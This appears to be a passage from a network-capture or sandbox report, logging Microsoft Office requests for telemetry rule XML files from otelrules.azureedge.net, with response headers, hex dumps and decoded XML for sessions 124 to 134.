2024-12-07 12:00:11 UTC	494	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 12:00:11 GMT Content-Type: text/xml Content-Length: 1362 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT ETag: "0x8DC582BEB256F43" x-ms-request-id: a681d1f9-301e-0020-1b07-486299000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T120011Z-r1cf579d778dfdgnhC1EWRd3w00000000200000000004e46 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 12:00:11 UTC	1362	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 30 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 6c 65 61 73 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65 6c 65 61 73 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701050" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Release" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenRelease" S="Medium" /> <F T="2">

Session ID	Source IP	Source Port	Destination IP	Destination Port
124	192.168.2.7	49852	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 12:00:10 UTC	192	OUT	GET /rules/rule701051v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 12:00:11 UTC	515	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 12:00:11 GMT Content-Type: text/xml Content-Length: 1399 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:47 GMT ETag: "0x8DC582BE1CC18CD" x-ms-request-id: 1f576be4-501e-008f-5405-489054000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T120011Z-r1cf579d778g2t6ghC1EWRfggs00000001n0000000003ugc x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-12-07 12:00:11 UTC	1399	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 30 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 6c 65 61 73 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701051" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Release.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenRe

Session ID	Source IP	Source Port	Destination IP	Destination Port
125	192.168.2.7	49850	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 12:00:11 UTC	192	OUT	GET /rules/rule701800v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 12:00:11 UTC	494	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 12:00:11 GMT Content-Type: text/xml Content-Length: 1366 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:28:01 GMT ETag: "0x8DC582BEA414B16" x-ms-request-id: 22947e51-b01e-0021-7203-48cab7000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T120011Z-r1cf579d778qgtz2hC1EWRmgks000000023g000000002fsy x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 12:00:11 UTC	1366	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 38 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 73 6f 75 72 63 65 73 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65 73 6f 75 72 63 65 73 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701800" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Resources" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenResources" S="Medium" /> <F T="2

Session ID	Source IP	Source Port	Destination IP	Destination Port
126	192.168.2.7	49854	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 12:00:11 UTC	192	OUT	GET /rules/rule702751v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 12:00:11 UTC	494	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 12:00:11 GMT Content-Type: text/xml Content-Length: 1403 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT ETag: "0x8DC582BEB866CDB" x-ms-request-id: af038a62-701e-005c-6f03-48bb94000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T120011Z-r1cf579d778qgtz2hC1EWRmgks000000024g000000001yan x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 12:00:11 UTC	1403	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 37 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 75 62 6c 69 73 68 65 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702751" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Publisher.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken

Session ID	Source IP	Source Port	Destination IP	Destination Port
127	192.168.2.7	49855	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 12:00:13 UTC	192	OUT	GET /rules/rule702750v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 12:00:13 UTC	494	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 12:00:13 GMT Content-Type: text/xml Content-Length: 1366 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:54 GMT ETag: "0x8DC582BE5B7B174" x-ms-request-id: 7b8d486f-101e-0017-1506-4847c7000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T120013Z-r1cf579d778dfdgnhC1EWRd3w000000002200000000034ng x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 12:00:13 UTC	1366	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 37 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 75 62 6c 69 73 68 65 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 75 62 6c 69 73 68 65 72 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702750" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Publisher" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPublisher" S="Medium" /> <F T="2

Session ID	Source IP	Source Port	Destination IP	Destination Port
128	192.168.2.7	49857	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 12:00:13 UTC	192	OUT	GET /rules/rule703401v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 12:00:13 UTC	494	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 12:00:13 GMT Content-Type: text/xml Content-Length: 1425 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:55 GMT ETag: "0x8DC582BE6BD89A1" x-ms-request-id: b9413899-901e-0015-7203-48b284000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T120013Z-r1cf579d778x776bhC1EWRdk8000000002b0000000001zsq x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 12:00:13 UTC	1425	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 34 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 6c 65 53 75 72 66 61 63 65 73 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703401" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ProgrammableSurfaces.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="Nexus

Session ID	Source IP	Source Port	Destination IP	Destination Port
129	192.168.2.7	49858	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 12:00:13 UTC	192	OUT	GET /rules/rule702301v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 12:00:13 UTC	494	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 12:00:13 GMT Content-Type: text/xml Content-Length: 1399 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:28:00 GMT ETag: "0x8DC582BE976026E" x-ms-request-id: 1c872757-c01e-0034-1307-482af6000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T120013Z-r1cf579d778qgtz2hC1EWRmgks0000000230000000002xz4 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 12:00:13 UTC	1399	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 6a 65 63 74 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702301" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Project.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPr

Session ID	Source IP	Source Port	Destination IP	Destination Port
130	192.168.2.7	49856	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 12:00:13 UTC	192	OUT	GET /rules/rule702300v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 12:00:13 UTC	494	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 12:00:13 GMT Content-Type: text/xml Content-Length: 1362 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:37 GMT ETag: "0x8DC582BDC13EFEF" x-ms-request-id: 061d09a2-c01e-00a1-3006-487e4a000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T120013Z-r1cf579d778dc6d7hC1EWR2vs80000000320000000000bt5 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 12:00:13 UTC	1362	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 6a 65 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 6f 6a 65 63 74 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702300" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Project" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProject" S="Medium" /> <F T="2">

Session ID	Source IP	Source Port	Destination IP	Destination Port
131	192.168.2.7	49859	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 12:00:13 UTC	192	OUT	GET /rules/rule703400v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 12:00:14 UTC	494	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 12:00:13 GMT Content-Type: text/xml Content-Length: 1388 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:37 GMT ETag: "0x8DC582BDBD9126E" x-ms-request-id: 4471680c-501e-0047-7105-48ce6c000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T120013Z-r1cf579d778dfdgnhC1EWRd3w00000000200000000004e65 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 12:00:14 UTC	1388	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 34 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 6c 65 53 75 72 66 61 63 65 73 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 6f 67 72 61 6d 6d 61 62 6c 65 53 75 72 66 61 63 65 73 22 20 53 3d 22 4d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703400" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ProgrammableSurfaces" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProgrammableSurfaces" S="M

Session ID	Source IP	Source Port	Destination IP	Destination Port
132	192.168.2.7	49860	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 12:00:15 UTC	192	OUT	GET /rules/rule702501v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 12:00:16 UTC	494	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 12:00:15 GMT Content-Type: text/xml Content-Length: 1415 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:57 GMT ETag: "0x8DC582BE7C66E85" x-ms-request-id: 67adf02b-201e-0085-1211-4834e3000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T120015Z-r1cf579d778t6txphC1EWRsd4400000002ng000000004q6v x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 12:00:16 UTC	1415	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 69 6c 69 74 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702501" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Programmability.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenan

Session ID	Source IP	Source Port	Destination IP	Destination Port
133	192.168.2.7	49861	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 12:00:15 UTC	192	OUT	GET /rules/rule702500v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 12:00:16 UTC	494	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 12:00:15 GMT Content-Type: text/xml Content-Length: 1378 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:36 GMT ETag: "0x8DC582BDB813B3F" x-ms-request-id: af039603-701e-005c-3603-48bb94000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T120015Z-r1cf579d778t5c2lhC1EWRce3w000000031g000000000ux9 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 12:00:16 UTC	1378	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 69 6c 69 74 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 6f 67 72 61 6d 6d 61 62 69 6c 69 74 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702500" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Programmability" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProgrammability" S="Medium" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
134	192.168.2.7	49862	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 12:00:15 UTC	192	OUT	GET /rules/rule700501v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 12:00:16 UTC	494	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 12:00:16 GMT Content-Type: text/xml Content-Length: 1405 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:58 GMT ETag: "0x8DC582BE89A8F82" x-ms-request-id: be723ded-701e-0021-0f06-483d45000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T120016Z-r1cf579d778g2t6ghC1EWRfggs00000001mg000000004pud x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 12:00:16 UTC	1405	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 35 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 6f 77 65 72 50 6f 69 6e 74 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700501" V="1" DC="SM" EN="Office.Telemetry.Event.Office.PowerPoint.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI 